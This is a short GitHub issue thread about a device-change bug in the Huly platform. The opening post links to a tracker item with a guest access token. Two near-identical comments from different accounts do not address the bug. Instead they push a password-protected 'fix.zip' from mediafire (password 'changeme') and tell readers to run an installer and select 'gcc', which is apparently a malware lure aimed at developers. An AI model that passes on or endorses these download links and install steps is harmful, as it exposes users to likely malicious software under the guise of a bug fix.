### ISSUE TITLE
Device change in office doesn't work

### ISSUE THREAD

**Issue by BykhovDenis** [hcengineering/platform#6414]
<sub><a href="https://front.hc.engineering/guest/platform?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsaW5rSWQiOiI2NmNlY2Y2MTdhYmM5ZjVjYmY1ZWI1OWQiLCJndWVzdCI6InRydWUiLCJlbWFpbCI6IiNndWVzdEBoYy5lbmdpbmVlcmluZyIsIndvcmtzcGFjZSI6InBsYXRmb3JtIn0.n6RU1F0va4VCi0fuxuPUkI32vOc3_KUmLVukXr7kB4A">Huly&reg;: <b>UBERF-7965</b></a></sub>

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
